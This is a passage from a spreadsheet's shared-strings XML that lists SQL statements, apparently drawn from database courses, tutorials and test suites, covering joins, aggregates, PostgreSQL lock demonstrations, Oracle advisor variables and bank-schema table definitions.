    <t>SELECT V1.SNO, Shipping + Used AS Total FROM V1 RIGHT OUTER JOIN V2 ON V1.SNO  =  V2.SNO</t>
  </si>
  <si>
    <t>SELECT V2.SNO, COALESCE ( Shipping,0 )  + COALESCE ( Used,0 )  AS Total FROM V1 FULL OUTER JOIN V2 ON V1.SNO  =  V2.SNO</t>
  </si>
  <si>
    <t>SELECT V2.SNO, COALESCE ( Shipping,0 )  + Used AS Total FROM V1 RIGHT OUTER JOIN V2 ON V1.SNO  =  V2.SNO</t>
  </si>
  <si>
    <t>SELECT V2.SNO, Shipping + Used AS Total FROM V1 RIGHT OUTER JOIN V2 ON V1.SNO  =  V2.SNO</t>
  </si>
  <si>
    <t>SELECT VALUE FROM TEST ORDER BY VALUE DESC LIMIT 3</t>
  </si>
  <si>
    <t>SELECT VALUE FROM TEST ORDER BY VALUE LIMIT 3</t>
  </si>
  <si>
    <t>SELECT VolumeName AS Volume,VolMounts AS Mounts,VolErrors AS Errors, VolWrites AS Writes,VolStatus AS Status FROM Media WHERE  ( VolErrors&gt;0 )  OR  ( VolStatus = 'Error' )  OR  ( VolMounts&gt;50 )  OR  ( VolStatus = 'Disabled' )  OR  ( VolWrites&gt;3999999 )  ORDER BY VolStatus ASC, VolErrors,VolMounts,VolumeName DESC</t>
  </si>
  <si>
    <t>SELECT VolumeName,VolStatus,Storage.Name AS Location, VolBytes/ ( 1024*1024*1024 )  AS GB,MediaId,MediaType,Pool.Name AS Pool FROM Media,Pool,Storage WHERE Media.PoolId = Pool.PoolId AND Media.StorageId = Storage.StorageId AND InChanger = 0 AND   (  (  VolStatus = 'Purged' )  OR  ( VolStatus = 'Append' )  OR  ( VolStatus = 'Recycle'  )  )   ORDER BY VolMounts ASC, Pool.Name ASC, VolumeName ASC SELECT VolumeName, Job.JobId as JobID, Job.Name as JobName, Job.StartTime as Start, sum ( JobFiles )  AS Files,sum ( JobBytes )  AS Bytes FROM Job,JobMedia,Media WHERE JobMedia.JobId = Job.JobId AND JobMedia.MediaId = Media.MediaId GROUP by VolumeName, Job.JobID, Job.Name, Job.StartTime ORDER by VolumeName</t>
  </si>
  <si>
    <t>SELECT X.country, count ( * )  FROM Company X, Product Y WHERE X.cname = Y.manufacturer GROUP BY X.country;</t>
  </si>
  <si>
    <t>SELECT X.pname FROM  ( SELECT * FROM Product AS Y WHERE Y.price &gt; '$20' )  AS X WHERE X.price &lt; '$30';</t>
  </si>
  <si>
    <t>SELECT X.pname,  ( SELECT Y.country FROM Company Y WHERE Y.cname = X.manufacturer )  FROM Product X;</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT YEAR ( EMENDATE ) , MONTH ( EMENDATE ) , DAY ( EMENDATE ) , HOUR ( EMPTIME ) , MINUTE ( EMPTIME ) , SECOND ( EMPTIME ) , MICROSECOND ( EMPTIME )  FROM USRT029.EMPROJACT WHERE DEPTNO  = 'M10' AND EMENDATE IS NOT NULL AND PROJNO  =  '973' UNION SELECT YEAR ( EMSTDATE ) , MONTH ( EMSTDATE ) , DAY ( EMSTDATE ) , HOUR ( EMPTIME ) , MINUTE ( EMPTIME ) , SECOND ( EMPTIME ) , MICROSECOND ( EMPTIME )  FROM USRT029.EMPROJACT WHERE EMENDATE IS NOT NULL AND DEPTNO  = 'S33' UNION SELECT YEAR ( EMSTDATE ) , MONTH ( EMSTDATE ) , DAY ( EMSTDATE ) , HOUR ( EMPTIME ) , MINUTE ( EMPTIME ) , SECOND ( EMPTIME ) , MICROSECOND ( EMPTIME )  FROM USRT029.EMPROJACT WHERE DEPTNO  =   (  SELECT MAX ( DEPTNO )  FROM USRT029.EMPROJACT  ) </t>
  </si>
  <si>
    <t>SELECT a.analysis_id, a.program, COUNT ( cf.feature_id )  FROM analysis a, analysisfeature af, feature cf WHERE a.analysis_id  =  af.analysis_id AND af.feature_id  =  cf.feature_id GROUP BY a.analysis_id, a.program</t>
  </si>
  <si>
    <t>SELECT a.analysis_id, cv.name, ap.value FROM analysis a, analysisprop ap, cvterm cv WHERE a.program  =  'jaccard' AND a.analysis_id  =  ap.analysis_id AND ap.type_id  =  cv.cvterm_id AND cv.name  =  'query_bsml_file_list' ORDER BY a.analysis_id ASC</t>
  </si>
  <si>
    <t>SELECT a.analysis_id, o.genus, o.species, COUNT ( * )  AS num_proteins FROM analysis a, analysisfeature af, feature cf, featureloc fl, feature p, organism o WHERE a.program  =  'jaccard' AND a.analysis_id  =  af.analysis_id AND af.feature_id  =  cf.feature_id AND fl.feature_id  =  cf.feature_id AND fl.srcfeature_id  =  p.feature_id AND p.organism_id  =  o.organism_id GROUP BY a.analysis_id, o.genus, o.species</t>
  </si>
  <si>
    <t>SELECT analysis_id, program, sourcename FROM analysis</t>
  </si>
  <si>
    <t>SELECT c.country_id, c.cust_city, c.cust_last_name FROM customers c WHERE c.country_id IN  ( 'US', 'UK' )  AND ROWNUM&lt;20 ORDER BY c.country_id, c.cust_city, c.cust_last_name</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT c.dept, c.number FROM Class c, Teaches t, Instructor i WHERE c.dept  =  t.dept AND c.number  =  t.number AND t.username  =  i.username AND i.username  =  'zahorjan' </t>
  </si>
  <si>
    <t xml:space="preserve">SELECT c.dept, c.number, c.title FROM Class c, Teaches t, Instructor i WHERE c.dept  =  t.dept AND c.number  =  t.number AND t.username  =  i.username AND i.username NOT IN  ( 'levy', 'djw' )  </t>
  </si>
  <si>
    <t xml:space="preserve">SELECT c.dept, c.number, c.title FROM Class c, Teaches t1, Teaches t2, Instructor i1, Instructor i2 WHERE c.dept  =  t1.dept AND c.dept  =  t2.dept AND c.number  =  t1.number AND c.number  =  t2.number AND t1.username  =  i1.username AND i1.username  =  'levy' AND t2.username  =  i2.username AND i2.username  =  'zahorjan' </t>
  </si>
  <si>
    <t>SELECT category, max ( price )  FROM Product GROUP BY category;</t>
  </si>
  <si>
    <t>SELECT cf.residues FROM feature cf WHERE cf.uniquename  =  '3890169_cogs'</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT cf.uniquename, a.program FROM feature p, featureloc fl, feature cf, analysisfeature af, analysis a WHERE p.uniquename  =  'pfa1.2280.m00238_protein' AND p.feature_id  =  fl.srcfeature_id AND fl.feature_id  =  af.feature_id AND af.feature_id  =  cf.feature_id AND af.analysis_id  =  a.analysis_id AND a.program in  ( 'jaccard', 'cogs' ) </t>
  </si>
  <si>
    <t>SELECT column1, column2 FROM table1, table2 WHERE column2 = 'value';</t>
  </si>
  <si>
    <t>SELECT count ( * )  AS Jobs,sum ( JobFiles )  AS Files,sum ( JobBytes )  AS Bytes,Name AS Job FROM Job GROUP by Name</t>
  </si>
  <si>
    <t>SELECT count ( * )  AS Jobs,sum ( JobFiles )  AS Files,sum ( JobBytes )  AS Bytes,VolumeName FROM Job,JobMedia,Media WHERE JobMedia.JobId = Job.JobId AND JobMedia.MediaId = Media.MediaId GROUP by VolumeName</t>
  </si>
  <si>
    <t>SELECT count ( DISTINCT category )  FROM Product WHERE price &gt; '$20';</t>
  </si>
  <si>
    <t>SELECT count ( category )  FROM Product WHERE price &gt; '$20'</t>
  </si>
  <si>
    <t>SELECT ctid, xmin, * FROM lockdemo</t>
  </si>
  <si>
    <t>SELECT current_date FROM dual</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT dept, number, SUBSTR ( title, 1, 12 )  AS short_title FROM Class </t>
  </si>
  <si>
    <t>SELECT e.ename, d.dname FROM emp e, dept d WHERE e.deptno  =  d.deptno order by e.ename</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT first_name || ' ' || last_name as Full_Name FROM employees WHERE job_id  =   ( SELECT job_id FROM jobs WHERE job_title  =  'President' ) </t>
  </si>
  <si>
    <t xml:space="preserve">SELECT first_name, last_name FROM employees WHERE job_id  =   ( SELECT job_id FROM jobs WHERE job_title  =  'President' ) </t>
  </si>
  <si>
    <t xml:space="preserve">SELECT fname FROM Instructor WHERE username  =  'zahorjan' </t>
  </si>
  <si>
    <t>SELECT i.highway FROM geod_states s, geod_interstates i WHERE s.state  =  'New Hampshire' AND mdsys.sdo_filter  ( i.geom, s.geom )   =  'TRUE'</t>
  </si>
  <si>
    <t>SELECT intcol, charcol FROM TBLV0100.manytypes_ctrl WHERE intcol in  (  SELECT t1.intcol FROM   (  (    (  (  TBLV0100.mtypes_1 T1 FULL JOIN TBLV0100.mtypes_2 T2 ON T1.charcol  =  T2.vcharcol AND T1.intcol  =  T2.dec62col )  FULL JOIN  ( TBLV0100.mtypes_2 T4 FULL JOIN TBLV0100.mtypes_1 T3 ON T4.smintcol  =  T3.dec62col )  ON T1.intcol  =  T4.intcol AND T2.charcol  =  T3.charcol )  FULL JOIN   (  (  TBLV0100.mtypes_1 T5 FULL JOIN TBLV0100.mtypes_2 T6 ON T5.charcol  =  T6.vcharcol AND T5.intcol  =  T6.dec62col )  FULL JOIN  ( TBLV0100.mtypes_2 T7 FULL JOIN TBLV0100.mtypes_1 T8 ON T7.smintcol  =  T8.dec62col )  ON T5.intcol  =  T8.dec62col AND T6.charcol  =  T7.charcol )  ON T5.dec62col  =  T1.dec62col AND T5.intcol  =  T3.intcol )  FULL JOIN   (  (   ( TBLV0100.mtypes_1 T9 FULL JOIN TBLV0100.mtypes_2 T10 ON T9.charcol  =  T10.vcharcol AND T9.intcol  =  T10.dec62col )  FULL JOIN  ( TBLV0100.mtypes_2 T12 FULL JOIN TBLV0100.mtypes_1 T11 ON T12.smintcol  =  T11.dec62col )  ON T9.intcol  =  T12.intcol AND T10.charcol  =  T11.charcol )  FULL JOIN   (  (  TBLV0100.mtypes_1 T13 FULL JOIN TBLV0100.mtypes_2 T14 ON T13.charcol  =  T14.vcharcol AND T13.intcol  =  T14.dec62col )  FULL JOIN  ( TBLV0100.mtypes_2 T15 FULL JOIN TBLV0100.mtypes_1 T16 ON T15.smintcol  =  T16.dec62col )  ON T13.intcol  =  T16.dec62col AND T14.charcol  =  T15.charcol )  ON T13.dec62col  =  T9.dec62col AND T13.intcol  =  T11.intcol )  ON T12.dec62col  =  T2.dec62col AND T14.intcol  =  T8.intcol )  FULL JOIN   (  (    (  (  TBLV0100.mtypes_1 T17 FULL JOIN TBLV0100.mtypes_2 T18 ON T17.charcol  =  T18.vcharcol AND T17.intcol  =  T18.dec62col )  FULL JOIN  ( TBLV0100.mtypes_2 T20 FULL JOIN TBLV0100.mtypes_1 T19 ON T20.smintcol  =  T19.dec62col )  ON T17.intcol  =  T20.intcol AND T18.charcol  =  T19.charcol )  FULL JOIN   (  (  TBLV0100.mtypes_1 T21 FULL JOIN TBLV0100.mtypes_2 T22 ON T21.charcol  =  T22.vcharcol AND T21.intcol  =  T22.dec62col )  FULL JOIN  ( TBLV0100.mtypes_2 T23 FULL JOIN TBLV0100.mtypes_1 T24 ON T23.smintcol  =  T24.dec62col )  ON T21.intcol  =  T24.dec62col AND T22.charcol  =  T23.charcol )  ON T21.dec62col  =  T17.dec62col AND T21.intcol  =  T19.intcol )  FULL JOIN   (  (   ( TBLV0100.mtypes_1 T25 FULL JOIN TBLV0100.mtypes_2 T26 ON T25.charcol  =  T26.vcharcol AND T25.intcol  =  T26.dec62col )  FULL JOIN  ( TBLV0100.mtypes_2 T28 FULL JOIN TBLV0100.mtypes_1 T27 ON T28.smintcol  =  T27.dec62col )  ON T25.intcol  =  T28.intcol AND T26.charcol  =  T27.charcol )  FULL JOIN  ( TBLV0100.mtypes_1 T29 FULL JOIN TBLV0100.mtypes_2 T30 ON T29.charcol  =  T30.vcharcol AND T29.intcol  =  T30.dec62col )  ON T29.dec62col  =  T25.dec62col AND T29.intcol  =  T27.intcol )  ON T28.dec62col  =  T18.dec62col AND T30.intcol  =  T24.intcol )  ON T28.dec62col  =  T2.dec62col AND T30.intcol  =  T14.intcol )  ORDER BY 1</t>
  </si>
  <si>
    <t>SELECT job_title,  ( SELECT count ( * )  FROM employees WHERE job_id  =  jobs.job_id )  AS job_count FROM jobs ORDER BY job_title</t>
  </si>
  <si>
    <t>SELECT job_title, count ( * )  AS job_count FROM employees INNER JOIN jobs ON jobs.job_id  =  employees.job_id WHERE employees.job_id  =  jobs.job_id GROUP BY job_title HAVING count ( * )   =  1 ORDER BY job_title</t>
  </si>
  <si>
    <t>SELECT job_title, count ( * )  AS job_count FROM employees INNER JOIN jobs ON jobs.job_id  =  employees.job_id WHERE employees.job_id  =  jobs.job_id GROUP BY job_title ORDER BY job_title</t>
  </si>
  <si>
    <t>SELECT job_title, min_salary, max_salary, actual_min, actual_max, avg_salary FROM  ( SELECT jobs.job_id, max ( salary )  AS actual_max FROM jobs INNER JOIN employees ON jobs.job_id  =  employees.job_id GROUP BY jobs.job_id )  salary_maxes INNER JOIN jobs ON jobs.job_id  =  salary_maxes.job_id INNER JOIN  ( SELECT jobs.job_id, avg ( salary )  AS avg_salary FROM jobs INNER JOIN employees ON jobs.job_id  =  employees.job_id GROUP BY jobs.job_id )  salary_averages on salary_averages.job_id  =  jobs.job_id INNER JOIN  ( SELECT jobs.job_id, min ( salary )  AS actual_min FROM jobs INNER JOIN employees ON jobs.job_id  =  employees.job_id GROUP BY jobs.job_id )  salary_mins on salary_mins.job_id  =  jobs.job_id</t>
  </si>
  <si>
    <t>SELECT job_title, min_salary, max_salary, actual_min, actual_max, avg_salary FROM  ( SELECT jobs.job_id, max ( salary )  AS actual_max, min ( salary )  AS actual_min, avg ( salary )  AS avg_salary FROM jobs INNER JOIN employees ON jobs.job_id  =  employees.job_id GROUP BY jobs.job_id )  salary_ags INNER JOIN jobs ON jobs.job_id  =  salary_ags.job_id create view salary_ranges SELECT sum ( salary )  FROM employees</t>
  </si>
  <si>
    <t>SELECT job_title, min_salary, max_salary, avg_salary FROM  ( SELECT jobs.job_id, avg ( salary )  AS avg_salary FROM jobs INNER JOIN employees ON jobs.job_id  =  employees.job_id GROUP BY jobs.job_id )  salary_averages INNER JOIN jobs ON jobs.job_id  =  salary_averages.job_id</t>
  </si>
  <si>
    <t>SELECT manufacturer, count ( * )  AS total FROM Product WHERE price &lt; '$200' GROUP BY manufacturer;</t>
  </si>
  <si>
    <t>SELECT num_select_stmt FROM user_advisor_sqlw_sum WHERE workload_name  =  :workload_name</t>
  </si>
  <si>
    <t>SELECT o.genus, o.species, COUNT ( * )  AS num_proteins FROM analysisfeature af, feature cf, featureloc fl, feature p, organism o WHERE af.analysis_id  =  2 AND af.feature_id  =  cf.feature_id AND fl.feature_id  =  cf.feature_id AND fl.srcfeature_id  =  p.feature_id AND p.organism_id  =  o.organism_id GROUP BY o.genus, o.species</t>
  </si>
  <si>
    <t>SELECT oid FROM pg_proc ORDER BY 1 LIMIT 8</t>
  </si>
  <si>
    <t>SELECT organism_id, genus, species FROM organism</t>
  </si>
  <si>
    <t>SELECT p.uniquename, fl.fmin, fl.fmax, fl.strand, fl.locgroup, fl.rank FROM feature cf, featureloc fl, feature p WHERE cf.uniquename  =  '3890169_cogs' AND fl.feature_id  =  cf.feature_id AND fl.srcfeature_id  =  p.feature_id</t>
  </si>
  <si>
    <t>SELECT parameter_name, parameter_value FROM user_advisor_parameters WHERE task_name  =  :task_name AND  ( parameter_name LIKE '%MVIEW%' OR parameter_name LIKE '%INDEX%' )  order by 1,2</t>
  </si>
  <si>
    <t>SELECT pg_advisory_lock ( col )  FROM lockdemo</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT pg_backend_pid (  ) </t>
  </si>
  <si>
    <t>SELECT pg_class.oid FROM pg_class JOIN pg_namespace ON  ( relnamespace  =  pg_namespace.oid )  JOIN pg_attribute ON  ( pg_class.oid  =  pg_attribute.attrelid )  LIMIT 1</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT pg_sleep ( 0.300 ) </t>
  </si>
  <si>
    <t xml:space="preserve">SELECT pg_sleep ( 0.500 ) </t>
  </si>
  <si>
    <t xml:space="preserve">SELECT pg_sleep ( 0.600 ) </t>
  </si>
  <si>
    <t>SELECT pname, price, manufacturer FROM Product WHERE category = 'Gadgets' AND price &gt; '$10' ORDER BY price, pname;</t>
  </si>
  <si>
    <t>SELECT rec_id, action_id, SUBSTR ( command, 1, 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</si>
  <si>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</si>
  <si>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:task_name2 ORDER BY rec_id, action_id</t>
  </si>
  <si>
    <t>SELECT rec_id, action_id, substr ( command,1,30 )  AS command FROM user_advisor_actions WHERE task_name  =  :task_name ORDER BY rec_id, action_id</t>
  </si>
  <si>
    <t>SELECT rec_id, rank, benefit FROM user_advisor_recommendations WHERE task_name  =  :task_name</t>
  </si>
  <si>
    <t>SELECT rec_id, rank, benefit FROM user_advisor_recommendations WHERE task_name  =  :task_name order by rec_id</t>
  </si>
  <si>
    <t>SELECT relname FROM pg_class ORDER BY 1 LIMIT 8</t>
  </si>
  <si>
    <t>SELECT source.name AS CallingFunction, dest.name AS CalledFunction FROM fcalls INNER JOIN functions AS source ON fcalls.sourceid  =  source.id INNER JOIN functions AS dest ON fcalls.destid  =  dest.id</t>
  </si>
  <si>
    <t>SELECT sql_id, rec_id, precost, postcost,  ( precost-postcost ) *100/precost AS percent_benefit FROM USER_ADVISOR_SQLA_WK_STMTS WHERE TASK_NAME  =  :task_name order by sql_id</t>
  </si>
  <si>
    <t>SELECT sql_id, rec_id, precost, postcost,  ( precost-postcost ) *100/precost AS percent_benefit FROM user_advisor_sqla_wk_stmts WHERE task_name  =  :task_name order by sql_id</t>
  </si>
  <si>
    <t>SELECT sql_id, username, optimizer_cost, SUBSTR ( sql_text, 1, 30 )  FROM user_advisor_sqlw_stmts WHERE workload_name  =  :workload_name ORDER BY sql_id</t>
  </si>
  <si>
    <t>SELECT state, landsqmi, SDO_GEOM.SDO_AREA ( c.geom,0.005,'unit = SQ_KM' )  FROM Geod_States c WHERE state_abrv = 'WA'</t>
  </si>
  <si>
    <t>SELECT substring ( relname, 1, 1 )  FROM pg_class ORDER BY 1 LIMIT 8</t>
  </si>
  <si>
    <t>SELECT sum ( price )  FROM Product WHERE manufacturer = 'GizmoWorks';</t>
  </si>
  <si>
    <t>SELECT sum ( salary )  AS salary, department_name FROM employees LEFT JOIN departments on departments.department_id  =  employees.department_id GROUP BY department_name</t>
  </si>
  <si>
    <t>SELECT sum ( salary )  AS salary, department_name FROM employees RIGHT JOIN departments on departments.department_id  =  employees.department_id GROUP BY department_name</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT sum ( salary )  from  (  SELECT sum ( salary )  as salary, department_name FROM employees INNER JOIN departments on departments.department_id  =  employees.department_id GROUP BY department_name  ) </t>
  </si>
  <si>
    <t>SELECT sum ( salary ) , department_name FROM employees FULL JOIN departments on departments.department_id  =  employees.department_id GROUP BY department_name</t>
  </si>
  <si>
    <t>SELECT t.calendar_month_desc, SUM ( s.amount_sold )  AS dollars FROM sales s, times t WHERE s.time_id  =  t.time_id AND s.time_id between TO_DATE ( '01-JAN-2000', 'DD-MON-YYYY' )  AND TO_DATE ( '01-JUL-2000', 'DD-MON-YYYY' )  GROUP BY t.calendar_month_desc ORDER BY t.calendar_month_desc</t>
  </si>
  <si>
    <t>SELECT tokensa.eid, min ( ids.name )  as identifier, min ( filesb.name )  as defined, min ( filesa.name )  as used FROM definers INNER JOIN tokens AS tokensa ON definers.basefileid  =  tokensa.fid INNER JOIN tokens AS tokensb ON definers.definerid  =  tokensb.fid INNER JOIN ids ON ids.eid  =  tokensa.eid INNER JOIN files as filesa ON tokensa.fid  =  filesa.fid INNER JOIN files as filesb ON tokensb.fid  =  filesb.fid WHERE tokensa.eid  =  tokensb.eid GROUP BY tokensa.eid, definerid, basefileid ORDER BY defined, identifier</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT txid_current (  ) </t>
  </si>
  <si>
    <t>SELECT u.country, v.pname, v.price FROM Company u, Product v,  ( SELECT x.country, max ( y.price )  as mprice FROM Company x, Product y WHERE x.cname  =  y.manufacturer GROUP BY x.country )  AS p WHERE u.country  =  p.country and v.price  =  p.mprice;</t>
  </si>
  <si>
    <t>SELECT virtualtransaction AS vxid, transactionid::text FROM pg_locks WHERE pid  =  pg_backend_pid (  )  ORDER BY 1, 2 LIMIT 1</t>
  </si>
  <si>
    <t>SELECT x.country, count ( * )  FROM Company x, Product y WHERE x.cname  =  y.manufacturer GROUP BY x.country;</t>
  </si>
  <si>
    <t>SELECT x.country, count ( y.pname )  FROM Company x LEFT OUTER JOIN Product y ON x.cname  =  y.manufacturer GROUP BY x.country;</t>
  </si>
  <si>
    <t>SELECT x.country, max ( y.price )  FROM Company x, Product y WHERE x.cname  =  y.manufacturer GROUP BY x.country;</t>
  </si>
  <si>
    <t>SELECT x.country, y.pname FROM Company x JOIN Product y ON x.cname  =  y.manufacturer</t>
  </si>
  <si>
    <t>SELECT x.country, y.pname FROM Company x LEFT OUTER JOIN Product y ON x.cname  =  y.manufacturer;</t>
  </si>
  <si>
    <t>SELECT x.country, y.pname FROM Company x, Product y WHERE x.cname  =  y.manufacturer;</t>
  </si>
  <si>
    <t>SELECT x.country, y.pname, y.price FROM Company x, Product y WHERE x.cname  =  y.manufacturer and y.price &gt; =  ALL  ( SELECT z.price FROM Product z WHERE x.cname  =  z.manufacturer ) ;</t>
  </si>
  <si>
    <t>UPDATE lockdemo SET col  =  1</t>
  </si>
  <si>
    <t>UPDATE lockdemo SET col  =  1 WHERE col  =  1</t>
  </si>
  <si>
    <t>UPDATE lockdemo SET col  =  2</t>
  </si>
  <si>
    <t>UPDATE lockdemo SET col  =  3</t>
  </si>
  <si>
    <t>UPDATE lockdemo SET col  =  3 WHERE col  =  3</t>
  </si>
  <si>
    <t>UPDATE lockdemo SET col  =  4</t>
  </si>
  <si>
    <t>UPDATE lockdemo SET col  =  40 WHERE col  =  40</t>
  </si>
  <si>
    <t>UPDATE lockdemo SET col  =  42 WHERE col  =  40</t>
  </si>
  <si>
    <t>UPDATE lockdemo SET col  =  5</t>
  </si>
  <si>
    <t>UPDATE lockdemo SET col  =  50 WHERE col  =  50</t>
  </si>
  <si>
    <t>UPDATE lockdemo SET col  =  51 WHERE col  =  50</t>
  </si>
  <si>
    <t>UPDATE lockdemo SET col  =  6</t>
  </si>
  <si>
    <t>UPDATE lockdemo SET col  =  61 WHERE col  =  60</t>
  </si>
  <si>
    <t>UPDATE lockdemo SET col  =  7</t>
  </si>
  <si>
    <t>UPDATE lockdemo SET col  =  81 WHERE col  =  80</t>
  </si>
  <si>
    <t>USE Parts GO SELECT * FROM SP</t>
  </si>
  <si>
    <t>VARIABLE collection_id NUMBER</t>
  </si>
  <si>
    <t xml:space="preserve">VARIABLE create_mv_ddl VARCHAR2 ( 4000 ) </t>
  </si>
  <si>
    <t>VARIABLE failed_stmts NUMBER</t>
  </si>
  <si>
    <t>VARIABLE no_recs NUMBER</t>
  </si>
  <si>
    <t>VARIABLE saved_stmts NUMBER</t>
  </si>
  <si>
    <t xml:space="preserve">VARIABLE sql_stmt VARCHAR2 ( 4000 ) </t>
  </si>
  <si>
    <t xml:space="preserve">VARIABLE sql_text VARCHAR2 ( 400 ) </t>
  </si>
  <si>
    <t xml:space="preserve">VARIABLE sql_text2 VARCHAR2 ( 400 ) </t>
  </si>
  <si>
    <t xml:space="preserve">VARIABLE task_cust_mv VARCHAR2 ( 30 ) </t>
  </si>
  <si>
    <t>VARIABLE task_id NUMBER</t>
  </si>
  <si>
    <t>VARIABLE task_id2 NUMBER</t>
  </si>
  <si>
    <t xml:space="preserve">VARIABLE task_name VARCHAR2 ( 255 ) </t>
  </si>
  <si>
    <t xml:space="preserve">VARIABLE task_name2 VARCHAR2 ( 255 ) </t>
  </si>
  <si>
    <t>VARIABLE template_id NUMBER</t>
  </si>
  <si>
    <t xml:space="preserve">VARIABLE template_name VARCHAR2 ( 255 ) </t>
  </si>
  <si>
    <t xml:space="preserve">VARIABLE workload_name VARCHAR2 ( 255 ) </t>
  </si>
  <si>
    <t xml:space="preserve">VARIABLE workload_name VARCHAR2 ( 30 ) </t>
  </si>
  <si>
    <t xml:space="preserve">VARIABLE workload_name2 VARCHAR2 ( 255 ) </t>
  </si>
  <si>
    <t>WITH Sub ( ENO )  AS  (  SELECT ENO FROM E WHERE BossENO  =  'E1' UNION ALL SELECT E.ENO FROM E JOIN Sub S ON E.BossENO  =  S.ENO  )  SELECT ENO FROM Sub</t>
  </si>
  <si>
    <t>WITH V1 ( SNO,ORDERED )  AS  (  SELECT SNO,SUM ( QTY )  FROM SP GROUP BY SNO UNION SELECT SNO,0 FROM S WHERE SNO NOT IN  ( SELECT SNO FROM SP  )  )  , V2 ( SNO,USED )  AS  (  SELECT SNO,SUM ( QTY )  FROM SPJ GROUP BY SNO UNION SELECT SNO,0 FROM S WHERE SNO NOT IN  ( SELECT SNO FROM SPJ  )  )   SELECT V1.SNO, ORDERED+USED AS TOTAL FROM V1,V2 WHERE V1.SNO  =  V2.SNO</t>
  </si>
  <si>
    <t>WITH letter  ( letter, count )  AS  (  SELECT letter, COUNT ( * )  FROM sample GROUP BY 1  )  SELECT letter AS l, count,  ( SELECT * FROM lookup_letter ( letter )  AS l2 LIMIT 1 )  AS lookup_letter FROM letter ORDER BY 2 DESC</t>
  </si>
  <si>
    <t>WITH letter  ( letter, count )  AS  (  SELECT letter, COUNT ( * )  FROM sample GROUP BY 1  )  SELECT letter AS l, count, lookup_letter ( letter )  FROM letter ORDER BY 2 DESC</t>
  </si>
  <si>
    <t>WITH letters  ( letter, count )  AS  (  SELECT letter, COUNT ( * )  FROM sample GROUP BY 1  )  SELECT letter, count,  ( count * 100.0 /  ( SUM ( count )  OVER  (   )  )   ) ::numeric ( 4,1 )  AS "%" FROM letters ORDER BY 2 DESC</t>
  </si>
  <si>
    <t>a1 ( minSalary, maxSalary, avgSalary, sumSalary, countEmps )  : =  select min ( E.eSalary ) , max ( E.eSalary ) , avg ( E.eSalary ) , sum ( E.eSalary ) , count ( * )  from employee E</t>
  </si>
  <si>
    <t>a2 ( numEmpsTakenDB )  : =  select count ( distinct T.eID )  from dbCourse D, takes T where D.cID  =  T.cID</t>
  </si>
  <si>
    <t>alter system flush shared_pool</t>
  </si>
  <si>
    <t>alter table product add foreign key  ( manufacturer )  references company;</t>
  </si>
  <si>
    <t>begin sql_stmt : =  'SELECT /* Query */ t.week_ending_day, p.prod_subcategory, sum ( s.amount_sold )  AS dollars, s.channel_id, s.promo_id FROM sales s, times t, products p WHERE s.time_id  =  t.time_id AND s.prod_id  =  p.prod_id AND s.prod_id &gt; 10 AND s.prod_id &lt; 50 GROUP BY t.week_ending_day, p.prod_subcategory, s.channel_id, s.promo_id'</t>
  </si>
  <si>
    <t>begin transaction</t>
  </si>
  <si>
    <t>commit</t>
  </si>
  <si>
    <t>connect / as sysdba</t>
  </si>
  <si>
    <t>connect /as sysdba</t>
  </si>
  <si>
    <t>connect scott/tiger</t>
  </si>
  <si>
    <t>connect sh/sh</t>
  </si>
  <si>
    <t xml:space="preserve">create index name_idx on students ( name ) </t>
  </si>
  <si>
    <t xml:space="preserve">create index teid on tokens ( eid ) </t>
  </si>
  <si>
    <t xml:space="preserve">create index tfid on tokens ( fid ) </t>
  </si>
  <si>
    <t>create table Product  ( pid int primary key, pname text, manufacturer text ) ;</t>
  </si>
  <si>
    <t>create table Purchase  ( pid int primary key, product text, price float, quantity int, month varchar ( 15  )  )  ;</t>
  </si>
  <si>
    <t xml:space="preserve">create table account  ( account_id integer unsigned not null auto_increment, product_cd varchar ( 10 )  not null, cust_id integer unsigned not null, open_date date not null, close_date date, last_activity_date date, status enum ( 'ACTIVE','CLOSED','FROZEN' ) , open_branch_id smallint unsigned, open_emp_id smallint unsigned, avail_balance float ( 10,2 ) , pending_balance float ( 10,2 ) , constraint fk_product_cd foreign key  ( product_cd )  references product  ( product_cd ) , constraint fk_a_cust_id foreign key  ( cust_id )  references customer  ( cust_id ) , constraint fk_a_branch_id foreign key  ( open_branch_id )  references branch  ( branch_id ) , constraint fk_a_emp_id foreign key  ( open_emp_id )  references employee  ( emp_id ) , constraint pk_account primary key  ( account_id )   ) </t>
  </si>
  <si>
    <t xml:space="preserve">create table branch  ( branch_id smallint unsigned not null auto_increment, name varchar ( 20 )  not null, address varchar ( 30 ) , city varchar ( 20 ) , state varchar ( 2 ) , zip varchar ( 12 ) , constraint pk_branch primary key  ( branch_id )   ) </t>
  </si>
  <si>
    <t xml:space="preserve">create table business  ( cust_id integer unsigned not null, name varchar ( 40 )  not null, state_id varchar ( 10 )  not null, incorp_date date, constraint fk_b_cust_id foreign key  ( cust_id )  references customer  ( cust_id ) , constraint pk_business primary key  ( cust_id )   ) </t>
  </si>
  <si>
    <t xml:space="preserve">create table customer  ( cust_id integer unsigned not null auto_increment, fed_id varchar ( 12 )  not null, cust_type_cd enum ( 'I','B' )  not null, address varchar ( 30 ) , city varchar ( 20 ) , state varchar ( 20 ) , postal_code varchar ( 10 ) , constraint pk_customer primary key  ( cust_id )   ) </t>
  </si>
  <si>
    <t xml:space="preserve">create table department  ( dept_id smallint unsigned not null auto_increment, name varchar ( 20 )  not null, constraint pk_department primary key  ( dept_id )   ) </t>
  </si>
  <si>
    <t xml:space="preserve">create table employee  ( emp_id smallint unsigned not null auto_increment, fname varchar ( 20 )  not null, lname varchar ( 20 )  not null, start_date date not null, end_date date, superior_emp_id smallint unsigned, dept_id smallint unsigned, title varchar ( 20 ) , assigned_branch_id smallint unsigned, constraint fk_e_emp_id foreign key  ( superior_emp_id )  references employee  ( emp_id ) , constraint fk_dept_id foreign key  ( dept_id )  references department  ( dept_id ) , constraint fk_e_branch_id foreign key  ( assigned_branch_id )  references branch  ( branch_id ) , constraint pk_employee primary key  ( emp_id )   ) </t>
  </si>
  <si>
